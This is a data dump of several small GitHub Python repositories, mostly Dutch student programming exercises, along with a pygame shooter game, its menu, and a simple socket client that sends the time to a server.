round(joystick.get_axis(1))\r\n\r\n\r\n\tif (keys[pygame.K_z] or J_but0):\r\n\t\tif len(bullets) <= 5:\r\n\t\t\tbullets.append(bullet_obj(round(x + width // 2),round(y + height // 2),1,3,(random.randint(0,255),random.randint(0,255),random.randint(0,255))))\r\n\tif (keys[pygame.K_LEFT] or horiz_axis_pos == -1) and x > 0:\r\n\t\tx -=speed\r\n\t\tleft = True\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tlastMove = \"left\"\r\n\telif (keys[pygame.K_RIGHT] or horiz_axis_pos == 1) and x < window_size_x - width:\r\n\t\tx +=speed\r\n\t\tleft = False\r\n\t\tright = True\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tlastMove = \"right\"\r\n\telif (keys[pygame.K_DOWN] or vert_axis_pos == 1) and y < window_size_y - height:\r\n\t\ty+=speed\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = True\r\n\t\tlastMove = \"down\"\r\n\telif (keys[pygame.K_UP] or vert_axis_pos == -1) and y > 0:\r\n\t\ty -=speed\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = True\r\n\t\tdown = False\r\n\t\tlastMove = \"up\"\r\n\telse:\r\n\t\tleft = False\r\n\t\tright = False\r\n\t\tup = False\r\n\t\tdown = False\r\n\t\tanimCount = 0\r\n\tif random.random() > chance_dummie_do_not_spawn:\r\n\t\tdummies.append(dummie_obj(random.randint(5,500),-40))\r\n\tfor event in pygame.event.get():\r\n\t\tif event == pygame.QUIT:\r\n\t\t\trun = False\r\n\tfor bullet in bullets:\r\n\t\tif bullet.y < 500 and bullet.y > 0:\r\n\t\t\tbullet.y -= bullet.vel\r\n\t\telse:\r\n\t\t\tbullets.pop(bullets.index(bullet))\r\n\tfor dummie_ in dummies:\r\n\t\tif dummie_.y < 500 and dummie_.y > -50:\r\n\t\t\tdummie_.y += dummie_.vel\r\n\t\telse:\r\n\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\tif dummie_.isCollide(x,y,width,height):\r\n\t\t\tdummie_.boom(game)\r\n\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\t\tif lives_int == 1:\r\n\t\t\t\tif score_int < int(getscores(0)):\r\n\t\t\t\t\tif score_int < int(getscores(1)):\r\n\t\t\t\t\t\tif score_int < int(getscores(2)):\r\n\t\t\t\t\t\t\tlines = [getscores(0),getscores(1),getscores(2)]\r\n\t\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlines = [getscores(0),getscores(1),str(score_int)]\r\n\t\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlines = [getscores(0),str(score_int),getscores(1)]\r\n\t\t\t\t\t\tsetscores(lines)\r\n\t\t\t\telse:\r\n\t\t\t\t\tlines = [str(score_int),getscores(0),getscores(1)]\r\n\t\t\t\t\tsetscores(lines)\r\n\t\t\t\traise SystemExit\r\n\t\t\telse:\r\n\t\t\t\tlives_int -= 1\r\n\t\tfor bullet in bullets:\r\n\t\t\tif dummie_.isCollide(bullet.x,bullet.y,32,32):\r\n\t\t\t\tdummie_.boom(game)\r\n\t\t\t\ttry:\r\n\t\t\t\t\tdummies.pop(dummies.index(dummie_))\r\n\t\t\t\t\tbullets.pop(bullets.index(bullet))\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint(u'Не обращайте внимание, это предупреждение о том что сразу две пули попали в объект((((')\r\n\t\t\t\tscore_int += 1\r\n\tupdate_window()\r\nrun = False\r\n" }, { "alpha_fraction": 0.5405872464179993, "alphanum_fraction": 0.5868739485740662, "avg_line_length": 27.24242401123047, "blob_id": "3850e1db6f32688c036946509bb16ce667e3edf3", "content_id": "afc305e3aef9ab4b5f0e35da241d581f253683a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2895, "license_type": "no_license", "max_line_length": 92, "num_lines": 99, "path": "/Astro Atack!/menu.py", "repo_name": "BYTEic/AstroAttack", "src_encoding": "UTF-8", "text": "import pygame\r\nimport time\r\nrun = False\r\npygame.joystick.init()\r\njoystick = pygame.joystick.Joystick(0)\r\njoystick.init()\r\ndef getscores_all():\r\n config = open('hightscores.txt','r')\r\n return config.read().splitlines()\r\ndef game_init__():\r\n global window_size_x\r\n window_size_x = 500\r\n global window_size_y\r\n window_size_y = 500\r\n global menuScores\r\n menuScores = False\r\n global ticks\r\n ticks = 30\r\n global clock\r\n clock = pygame.time.Clock()\r\n global run_menu\r\n run_menu = True\r\n pygame.mixer.init(frequency=44100, size=-16, channels=1, buffer=4096)\r\n pygame.init()\r\n global menu\r\n menu = pygame.display.set_mode((window_size_x,window_size_y))\r\n pygame.display.set_caption(\"Astro attack!\")\r\n global background\r\n background = pygame.image.load('menuScreen.bmp')\r\n global basis33\r\n basis33 = pygame.font.Font('basis33.ttf',40)\r\n global press_b_text\r\n press_b_text = basis33.render('PRESS B FOR GET HIGHSCORES', True, (200,200,0), (0,0,50))\r\n global HIGHTSCORES\r\n HIGHTSCORES_list = getscores_all()\r\n HIGHTSCORES = basis33.render('HIGHSCORES', False, (200,200,0))\r\n global hight0\r\n hight0 = basis33.render(HIGHTSCORES_list[0],False, (0,250,0))\r\n global hight1\r\n hight1 = basis33.render(HIGHTSCORES_list[1],False, (0,250,0))\r\n global hight2\r\n hight2 = basis33.render(HIGHTSCORES_list[2],False, (0,250,0))\r\n pygame.mixer.music.load(\"sounds/menu.wav\")\r\n global gameover_hud\r\n gameover_hud = pygame.image.load('gameover_hud.bmp')\r\n global music\r\n music = 0\r\ngame_init__()\r\n\r\ndef update_window_menu():\r\n global music\r\n menu.blit(background,(0,0))\r\n if music == 0:\r\n pygame.mixer.music.play(5,0)\r\n if music == 4000000:\r\n music = -1\r\n music += 1\r\n menu.blit(press_b_text,(0,0))\r\n if menuScores:\r\n menu.fill((0,0,0))\r\n menu.blit(HIGHTSCORES,(0,0))\r\n menu.blit(hight0,(50,50))\r\n menu.blit(hight1,(50,100))\r\n menu.blit(hight2,(50,150))\r\n clock.tick(ticks)\r\n pygame.display.update()\r\ngame_init__()\r\ncheck_j = True\r\nwhile run_menu:\r\n if check_j:\r\n try:\r\n J_but0 = joystick.get_button(0)\r\n J_but1 = joystick.get_button(1)\r\n except:\r\n J_but0 = False\r\n J_but1 = False\r\n check_j = False\r\n for event in pygame.event.get():\r\n if event == pygame.QUIT:\r\n pygame.quit()\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_z] or J_but0:\r\n try:\r\n import main_game\r\n except SystemExit:\r\n menu.blit(gameover_hud, (0,0))\r\n\r\n game_init__()\r\n\r\n if keys[pygame.K_x] or J_but1:\r\n if menuScores == False:\r\n menuScores = True\r\n time.sleep(0.2)\r\n else:\r\n menuScores = False\r\n time.sleep(0.2)\r\n\r\n update_window_menu()\r\nimport menu\r\n" } ]
3
mateusz7812/net.py
https://github.com/mateusz7812/net.py
0f69a1acba21f912e58f9255ee2ee3311adc2046
c2b8a276cf640b65b8ad6d1575b0628ae0b7d568
36aecaca6b03f6422b72839490e7ec65afb3ee9a
refs/heads/master
2018-12-12T13:36:42.509725
2018-09-13T11:23:03
2018-09-13T11:23:03
147,659,006
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.590624988079071, "alphanum_fraction": 0.659375011920929, "avg_line_length": 17.882352828979492, "blob_id": "4b600a80731e452ff9e13688d2532b3d5a70fd4e", "content_id": "b7374fe72e39297cb9ed84166f206a08bb41309b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "no_license", "max_line_length": 53, "num_lines": 17, "path": "/client.py", "repo_name": "mateusz7812/net.py", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport time\n\nhost = '192.168.250.104'\nport = 50000\nsize = 1024\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host,port))\nsys.stdout.write('%')\n\nwhile 1:\n line = str(time.ctime(time.time())) + ' '\n s.send(line)\n data = s.recv(size)\n sys.stdout.write(data)\ns.close()" } ]
1
KristiaanSondaar/Programming2
https://github.com/KristiaanSondaar/Programming2
8b7d7fdf2c6c452ace760435f8269b94f0b85cdf
0965d63fc0865b3bf9c36544265c78fd8598ebf7
a5a1663cbdef682e2dfbf62b2d77b0a04f038d6d
refs/heads/master
2020-04-01T17:41:01.424875
2018-10-17T11:10:21
2018-10-17T11:10:21
153,444,129
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5886076092720032, "alphanum_fraction": 0.6012658476829529, "avg_line_length": 12.25, "blob_id": "10f5f75e5de91c5d07cb504dfbb843ad1e5ea522", "content_id": "07742e7838141ec585ce1486f037abfe87df5c9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 24, "num_lines": 12, "path": "/Opdrachten/6.0 Functie met (im)mutable parameter.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def wijzig(letterlijst):\n lijst.clear()\n lijst.extend(lijst2)\n\n\nlijst = ['a','b','c']\nlijst2 = ['d', 'e', 'f']\n\n\nprint(lijst)\nwijzig(lijst)\nprint(lijst)" }, { "alpha_fraction": 0.6392694115638733, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26.375, "blob_id": "5e260e9a780e443fe75bd8a604c2946f6a57f20a", "content_id": "859eba702704b9ac39a316932f4bd0d9d1b72898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 74, "num_lines": 8, "path": "/Opdrachten/2.0 list and strings.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "lijst = eval(input('Geef lijst met minimaal 10 strings: '))\nlijst2 = []\nfor char in lijst:\n if len(char) == 4:\n lijst2.append(char)\n\n\nprint(\"De nieuw-gemaakte lijst met alle vier-letter strings is: \", lijst2)\n" }, { "alpha_fraction": 0.5053763389587402, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 13.230769157409668, "blob_id": "9e24f7f81d92bbe829c92c0076aa5242576ec578", "content_id": "f3478ae9b47db666906d4a76bdb80f550227f54e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 42, "num_lines": 13, "path": "/Opdrachten/1. Formatting.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def convert(celsius):\n return celsius * 1.8 + 32\n\n\ncelsius = 25\n\nprint(convert(celsius))\n\nprint(' F C')\n\n\nfor i in range(-30,50,10):\n print('{:5}{:5}'.format(convert(i),i))\n\n" }, { "alpha_fraction": 0.6255000233650208, "alphanum_fraction": 0.6284999847412109, "avg_line_length": 32.86440658569336, "blob_id": "dc59d3b91fb4276229b36582ea9ef1de33332ab6", "content_id": "c4b2939ebb6bfad006e42d9fec447e828997d9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2000, "license_type": "no_license", "max_line_length": 121, "num_lines": 59, "path": "/Miniproject programming/miniproject.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\ndef terugomzettenASCII(omgezetteWaarde):\n lijst = list(omgezetteWaarde)\n i = 0\n omgezetteWaarde = []\n for letter in lijst:\n ASCII = ord(lijst[i]) + 3\n CHAR = chr(ASCII)\n omgezetteWaarde.append(CHAR)\n i += 1\n zin = ''.join(omgezetteWaarde)\n return zin\n\ndef omzettenASCII(omzetWaarde):\n lijst = list(omzetWaarde)\n i = 0\n omgezetteWaarde = []\n for letter in lijst:\n ASCII = ord(lijst[i]) - 3\n CHAR = chr(ASCII)\n omgezetteWaarde.append(CHAR)\n i += 1\n zin = ''.join(omgezetteWaarde)\n return zin\n\n\n\n\ndef opslaanRegistratienummer():\n with open('stalling.csv', 'r', newline='') as myCSVFile:\n reader = csv.DictReader(myCSVFile, delimiter=',')\n registratienummer = []\n wachtwoorden = []\n for row in reader:\n omgezet = terugomzettenASCII(row['uhjlvwudwlhqxpphu'])\n wachtwoordOmgezet = terugomzettenASCII(row['t^`eqtlloa'])\n registratienummer.append(omgezet)\n wachtwoorden.append(wachtwoordOmgezet)\n return registratienummer, wachtwoorden\n\ndef ophalen():\n registratienummers, wachtwoorden = opslaanRegistratienummer()\n while True:\n invoerRegistratienummer = input(\"Geef alstublieft uw registratienummer: \")\n if invoerRegistratienummer in registratienummers:\n while True:\n indexRegistratienummer = registratienummers.index(invoerRegistratienummer)\n invoerWachtwoord = input(\"Geef alstublief uw wachtwoord: \")\n if invoerWachtwoord in wachtwoorden[indexRegistratienummer]:\n print(\"U kunt uw fiets nu ophalen! heb een prettige dag!\")\n break\n else:\n print(\"Dit wachtwoord hoord niet bij het registratienummer dat u heeft gegeven, probeer het opnieuw\")\n else:\n print(\"Dit registratienummer is niet in gebruik, probeer het nog een keer!\")\n break\n\nophalen()\n\n\n" }, { "alpha_fraction": 0.34734514355659485, "alphanum_fraction": 0.39712390303611755, "avg_line_length": 27.28125, "blob_id": "9ba18a48a2729b5084b1df7116a2f7a5368b8005", "content_id": "6084b33b08699410f8d5bfd3be6c49ed5dd5822d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 71, "num_lines": 32, "path": "/Opdrachten/7.2 Random.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "from random import *\n\ndef monopolyworp():\n x = randint(1, 6)\n y = randint(1, 6)\n x2 = randint(1, 6)\n y2 = randint(1, 6)\n x3 = randint(1, 6)\n y3 = randint(1, 6)\n rol = x + y\n rol2 = x2 + y2\n rol3 = x3 + y3\n for i in range(0,3):\n if x == y:\n print(x,\"+\", y,\"=\", rol, \"(dubbel)\")\n print(x2,\"+\", y2,\"=\", rol2)\n break\n elif x == y and x2 == y2:\n print(x, \"+\", y, \"=\", rol, \"(dubbel\")\n print(x2, \"+\", y2, \"=\", rol2, \"dubbel\")\n print(x3, \"+\", y3, \"=\", rol3)\n break\n elif x == y and x2 == y2 and x3 == y3:\n print(x, \"+\", y, \"=\", rol, \"(dubbel\")\n print(x2, \"+\", y2, \"=\", rol2, \"(dubbel)\")\n print(x3, \"+\", y3, \"=\", rol3, \"(direct naar de gevangenis\")\n break\n else:\n print(x,\"+\", y,\"=\", rol)\n break\n\nmonopolyworp()" }, { "alpha_fraction": 0.5283018946647644, "alphanum_fraction": 0.5345911979675293, "avg_line_length": 21.14285659790039, "blob_id": "535ea4b1b8816bb75f3e291a9af33c935f3aeb54", "content_id": "d227d98002f1f31bc143b9744b06aeaa42df47a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 159, "license_type": "no_license", "max_line_length": 49, "num_lines": 7, "path": "/Opdrachten/7.3 ASCII.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def code():\n invoerstring = input(\"Geef string: \").strip()\n for c in invoerstring:\n cope = ord(c) + 3\n print(chr(cope),end=\"\")\n\ncode()\n\n\n\n\n" }, { "alpha_fraction": 0.6122449040412903, "alphanum_fraction": 0.6275510191917419, "avg_line_length": 19.6842098236084, "blob_id": "e50b4870aa03b9d085b6d480658cbf27f41bea49", "content_id": "a5ad7f570ea939348eb4a41bbef80b23ab57860a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 85, "num_lines": 19, "path": "/Opdrachten/3. Files lezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "file = open(\"kaartnummers\", \"r\")\n\ncount = 0\nmaxNumber = 0\nlineCount = 1\n\nfor lines in file:\n count += 1\n number = int(lines.split(\",\")[0])\n if number > maxNumber:\n maxNumber = number\n maxLine = lineCount\n lineCount += 1\n\nprint('Deze file telt', count, \"regels\")\n\nprint(\"Het grootste kaartnummer is \",maxNumber, \" en dat staat op regel: \",lineCount)\n\nfile.close()" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.6116071343421936, "avg_line_length": 21.5, "blob_id": "41c193087831655c6ea956e651ee43b10cd2bf07", "content_id": "bea566d261d8e5051da773ec1095b280e751b8c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/Opdrachten/7.1. While-loop & numbers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "aantalNummers = 0\nsom = 0\nwhile True:\n getal = int(input(\"Geef een getal: \"))\n if getal == 0:\n break\n som += getal\n aantalNummers += 1\n\nprint(\"Er zijn\",aantalNummers, \"nummers ingevoerd, de som is: \", som)" }, { "alpha_fraction": 0.6132478713989258, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 29.225807189941406, "blob_id": "0de0061f0f4aac7d6b7346661e047502f727ce32", "content_id": "f912510b7b4a3e0c1c50e422070c48c149aaf089", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 936, "license_type": "no_license", "max_line_length": 65, "num_lines": 31, "path": "/Opdrachten/Final assignment NS functies.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def standaardprijs(afstandKM):\n if afstandKM > 0 and afstandKM <= 50:\n return afstandKM * 0.80\n if afstandKM < 0:\n return afstandKM == 0\n else:\n return (afstandKM * 0.60) + 15\n\n\naftstandKM = int(input('Geef de afstand van uw rit: '))\n\n\ndef ritprijs(leeftijd, weekendrit, afstandKM):\n if weekendrit == 'nee' and leeftijd >= 65 or leeftijd < 12:\n return standaardprijs(aftstandKM) * 0.70\n if weekendrit == 'ja' and leeftijd >= 65 or leeftijd < 12:\n return standaardprijs(aftstandKM) * 0.65\n if weekendrit == 'nee' and (leeftijd < 65 and leeftijd > 12):\n return standaardprijs(aftstandKM)\n if weekendrit == 'ja' and (leeftijd < 65 and leeftijd > 12):\n return standaardprijs(aftstandKM) * 0.60\n\n\nweekendrit = str(input('Rijs je in het weekend? ja of nee: '))\n\nleeftijd = int(input('Geef uw leeftijd: '))\n\n\nprijs = ritprijs(leeftijd, weekendrit, aftstandKM)\n\nprint(prijs)" }, { "alpha_fraction": 0.5319148898124695, "alphanum_fraction": 0.5617021322250366, "avg_line_length": 17.153846740722656, "blob_id": "ebf2faa0c78211b6cd775d438e7bdcd7274df1e1", "content_id": "9a665e9fd36ab6c134632e7da381233fda43cd3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 235, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/Opdrachten/2. files inlezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "infile = open(\"kaartnummers\", \"r\")\n\n\n\nfor line in infile:\n info = line.split(\",\")\n nummer = info[0]\n naam = info[1]\n print(naam, end=' ')\n print(('{:5}{0:5}{0:5}'.format(nummer),(\"heeft kaartnummer: \")))\n\n\ninfile.close()" }, { "alpha_fraction": 0.6288659572601318, "alphanum_fraction": 0.6288659572601318, "avg_line_length": 18.299999237060547, "blob_id": "540d0c14979eb146468d1362afac5d9f7281674f", "content_id": "62f55da85c49b945735c44d9d51c3a8cfbd4e8cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 46, "num_lines": 10, "path": "/Opdrachten/5. string functions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "woorden = []\n\ndef gemiddelde():\n zin = input(\"Geef een willekeurige zin: \")\n woorden = zin.split()\n for lengte in woorden:\n print(len(lengte))\n\ngemiddelde()\nprint(gemiddelde())\n\n" }, { "alpha_fraction": 0.7010050415992737, "alphanum_fraction": 0.7035176157951355, "avg_line_length": 27.071428298950195, "blob_id": "bf8414ce5689a5dc983f3d55b899ecf6b7a24858", "content_id": "576017b01397b7b311cfa7e470ea63e6d2ad1d88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 60, "num_lines": 14, "path": "/Opdrachten/4.0 functie met If.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def new_password(newpassword,oldpassword):\n if len(newpassword) >= 6 and newpassword != oldpassword:\n return\n\n\noldpassword = str(input('Geef oude wachtwoord: '))\nnewpassword = str(input('Geef nieuwe wachtwoord: '))\n\nisCorrect = new_password(newpassword,oldpassword)\n\nif isCorrect == True:\n print('Het is gelukt!')\nelse:\n print('Het password is hetzelfde of niet lang genoeg.')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6798029541969299, "alphanum_fraction": 0.6896551847457886, "avg_line_length": 17.454545974731445, "blob_id": "b1ba6c813a0e78433740b1ef397e38201dea59c4", "content_id": "2dec7aa435df792ddee72a13a8113317add8bbc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 44, "num_lines": 11, "path": "/Opdrachten/2. Functie met list-parameter.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def som(getallenLijst):\n return sum(getallenLijst)\n\ngetallenLijst = []\n\n\nfor i in range(0,5):\n nummers = int((input('Geef nummers: ')))\n getallenLijst.append(nummers)\n\nprint(som(getallenLijst))\n" }, { "alpha_fraction": 0.42763158679008484, "alphanum_fraction": 0.5, "avg_line_length": 20.571428298950195, "blob_id": "acae88acf29f15fb961a4ddd74fe4ba12b52afc6", "content_id": "00ea30af9190a0ae2c049b70791b83d49e8c85af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 152, "license_type": "no_license", "max_line_length": 87, "num_lines": 7, "path": "/Opdrachten/7.3. Dict.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "dict = {\"Jan\": 9,\"Piet\" : 8, \"Kees\":9,\"Larry\":6,\"John\":10,\"Bert\":7,\"Gijs\":9,\"Frans\":10}\n\n\n\nfor i in dict:\n if dict[i] > 8:\n print(dict[i],i)\n\n" }, { "alpha_fraction": 0.4751552939414978, "alphanum_fraction": 0.5093167424201965, "avg_line_length": 19.1875, "blob_id": "ba8d57ba23475cdbd68ba03e4c6722f5b4339ab1", "content_id": "78cd8b399e8337f177f5866a19ba6870c02c0387", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 41, "num_lines": 16, "path": "/Opdrachten/6.1 Decision Control.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "maand = int(input('Geef maand nummer: '))\n\n\ndef seizoen(maand):\n if (maand in (3 , 4 , 5)):\n season = ('Lente')\n elif (maand in (6, 7, 8)):\n season = ('Zomer')\n elif (maand in (9, 10, 11)):\n season = ('Herfst')\n else:\n season = ('Winter')\n return season\n\n\nprint(seizoen(maand))" }, { "alpha_fraction": 0.640816330909729, "alphanum_fraction": 0.6897959113121033, "avg_line_length": 26.33333396911621, "blob_id": "c0cf509573984c2f39857696c917d26bda2a616e", "content_id": "0239dd1d8df8943cf331fa0edad8410b96a9830b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 47, "num_lines": 9, "path": "/Opdrachten/1. Functie met drie parameters.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "def som(getal1,getal2,getal3):\n return getal1 + getal2 + getal3\n\n\ngetal1 = int(input('Geef het eerste getal: '))\ngetal2 = int(input('Geef het tweede getal: '))\ngetal3 = int(input('Geef het derde getal: '))\n\nprint(som(getal1,getal2,getal3))" }, { "alpha_fraction": 0.5817694664001465, "alphanum_fraction": 0.6085790991783142, "avg_line_length": 23.928571701049805, "blob_id": "24f446a52ee6a21c75f1e12e7ab73b55e51ff015", "content_id": "4c14e457b04f0227b525fa0f890854c0246e71d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 373, "license_type": "no_license", "max_line_length": 62, "num_lines": 14, "path": "/Opdrachten/8.1. Catching exceptions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "\n\ntry:\n aantal = 0\n hotel = 4356\n kosten = 4356 / aantal\n if aantal < 0:\n print(\"Negatieve getallen zijn niet toegestaan!\")\n else:\n print(kosten)\nexcept TypeError:\n print(\"Gebruik cijfers voor het invoeren van het aantal!\")\nexcept ZeroDivisionError:\n print(\"Delen door nul kan niet!\")\nexcept:\n \"Onjuiste invoer!\"\n\n\n \n \n \n \n" }, { "alpha_fraction": 0.6171875, "alphanum_fraction": 0.671875, "avg_line_length": 31.08333396911621, "blob_id": "b1fe62fb24e2ec31a1b6471bdb3624e96eea03d4", "content_id": "18c1084def39b9a1ff80ddaa69c155435cef13ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/Opdrachten/3. Lists & numbers.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "invoer = \"5-9-7-1-7-8-3-2-4-8-7-9\"\n\nlijst = invoer.split(\"-\")\n\nlijst2 = list(map(int, lijst))\nlijst2.sort()\ngemiddelde = sum(lijst2) / len(lijst2)\n\nprint(\"Gesorteerde list van ints: \", lijst2)\nprint(\"Grootste getal: \", max(lijst2), \" en kleinste getal: \", min(lijst2))\nprint(\"aanstal getallen: \", len(lijst2), \"en Som van de getallen: \", sum(lijst2))\nprint(\"Gemiddelde: \", gemiddelde)" }, { "alpha_fraction": 0.6035714149475098, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 30.11111068725586, "blob_id": "e6885434e228e4e70c10842c70bb54f74ac29c6c", "content_id": "96af46d4e9207ba4948a19f4f3c15f94e4bfebb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 118, "num_lines": 9, "path": "/Opdrachten/1.1 Getallen, strings and conversions.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "cijferICOR = 7\ncijferPROG = 7\ncijferCSN = 7\n\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN) / 3\nbeloning = (7 * 30) + (7 * 30) + (7 * 30)\noverzicht = \"Mijn cijfers (gemiddeld een \" + str(gemiddelde) + \") leveren een beloning van $\" + str(beloning) + \" op!\"\n\nprint (overzicht)\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5362318754196167, "avg_line_length": 19.352941513061523, "blob_id": "d9c41a252c56aac4c492994339e1bd1fd9e7bb29", "content_id": "51d49cd889baa6bcd9fa8cd8f865001f65bc8bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "no_license", "max_line_length": 69, "num_lines": 17, "path": "/Opdrachten/8.3. CSV-files lezen.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "import csv\n\n\nmax = 0\nnaam = \"\"\ndatum = \"\"\nwith open('gamers.csv', 'r') as gamersFile:\n reader = csv.reader(gamersFile, delimiter=';')\n for row in reader:\n if int(row[2]) > max:\n naam = row[0]\n datum = row[1]\n max = int(row[2])\n\n\n\nprint(\"De hoogste score is:\", max, \"op\", datum, \"behaald door\", naam)" }, { "alpha_fraction": 0.6860264539718628, "alphanum_fraction": 0.6877515912055969, "avg_line_length": 39.44186019897461, "blob_id": "d80e6f954a2f9d900d80ae5a5c2d4cda71becf2a", "content_id": "553b187144ab14521241274e5f6646ac0d1ca759", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 100, "num_lines": 43, "path": "/Opdrachten/Final Assignment NS-kaartautomaat.py", "repo_name": "KristiaanSondaar/Programming2", "src_encoding": "UTF-8", "text": "stations = [\"Schagen\", \"Heerhugowaard\", \"Alkmaar\", \"Castricum\", \"Zaandam\",\n \"Amsterdam\" \"Sloterdijk\", \"Amsterdam Centraal\", \"Amsterdam Amstel\", \"Utrecht Centraal\",\n \"’s-Hertogenbosch\", \"Eindhoven\", \"Weert\", \"Roermond\", \"Sittard\", \"Maastricht\"]\n\n\ndef inlezen_beginstation(stations):\n while True:\n beginstation = input(\"Wat is je beginstation?: \")\n if beginstation in stations:\n break\n return beginstation\n\ndef inlezen_eindstation(stations, beginstation):\n while True:\n eindstation = input(\"Wat is je eindstation?: \")\n eindIndex = stations.index(eindstation)\n beginIndex = stations.index(beginstation)\n if eindstation in stations and eindIndex > beginIndex:\n break\n else:\n print(\"Dit station ligt niet op de route\")\n return eindstation\n\n\ndef omroepen_reis(stations, beginstation, eindstation):\n beginRangnummer = stations.index(beginstation) + 1\n eindRangnummer = stations.index(eindstation) + 1\n print(\"Het beginstation\", beginstation, \"is het\", beginRangnummer,\"e station in het traject.\", )\n print(\"Het eindstation\", eindstation,\"is het\", eindRangnummer, \"e station in het traject.\")\n print(\"De afstand bedraagt\",eindRangnummer - beginRangnummer ,\"station(s).\")\n print(\"De prijs van het kaartje is\",(eindRangnummer - beginRangnummer)*5,\"euro.\\n\")\n print(\"Jij stapt in de trein in:\", beginstation,)\n for x in stations[beginRangnummer:stations.index(eindstation)]:\n print(\"-\",x)\n print(\"Jij stapt uit in:\", eindstation)\n return\n\n\n\n\nbeginstation = inlezen_beginstation(stations)\neindstation = inlezen_eindstation(stations, beginstation)\nomroepen_reis(stations, beginstation, eindstation)\n" }, { "alpha_fraction": 